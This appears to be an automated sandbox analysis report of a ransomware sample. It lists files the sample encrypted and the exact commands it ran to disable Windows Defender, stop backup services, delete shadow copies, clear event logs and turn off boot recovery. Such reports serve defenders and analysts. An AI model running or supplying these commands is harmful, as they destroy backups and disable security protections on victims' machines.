| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_gfJCdcBmNiM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_XZaaja52vHI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_WrqVk9W0Ljo0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_9HdppsSj-1Y0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_uEdtgzlORy00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_DcjhVxajwBQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_U6QuQEubYv00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_50vkuL919wQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PoeYUHXaXaw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-join.avi | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\osknavbase.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wh4NRhQ-t3Y0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_0eJdgl4Lss40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Nop_iPUPw0k0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_FM9t8nAPi6E0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Mk5azhiaB2M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_qR6mQxCOL5A0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_avUMWFQQroM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_9ZisnEOs8hc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_SIgtDRGeLD40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Peacock.jpg | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\jconsole.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_2aQJvxbruGM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_KPIpt5M6MgI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_lrNLSGqd-N40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe
"C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1509d" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1509d" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1509d" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.32:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
| US | 8.247.211.254:80 | tcp |
Files
memory/1772-115-0x0000000000000000-mapping.dmp
memory/3260-116-0x0000000000000000-mapping.dmp
memory/3204-117-0x0000000000000000-mapping.dmp
memory/2912-118-0x0000000000000000-mapping.dmp
memory/1228-119-0x0000000000000000-mapping.dmp
memory/1596-120-0x0000000000000000-mapping.dmp
memory/2904-121-0x0000000000000000-mapping.dmp
memory/4064-122-0x0000000000000000-mapping.dmp
memory/1460-123-0x0000000000000000-mapping.dmp
memory/2052-124-0x0000000000000000-mapping.dmp
memory/2832-125-0x0000000000000000-mapping.dmp
memory/432-126-0x0000000000000000-mapping.dmp
memory/1360-127-0x0000000000000000-mapping.dmp
memory/2448-128-0x0000000000000000-mapping.dmp
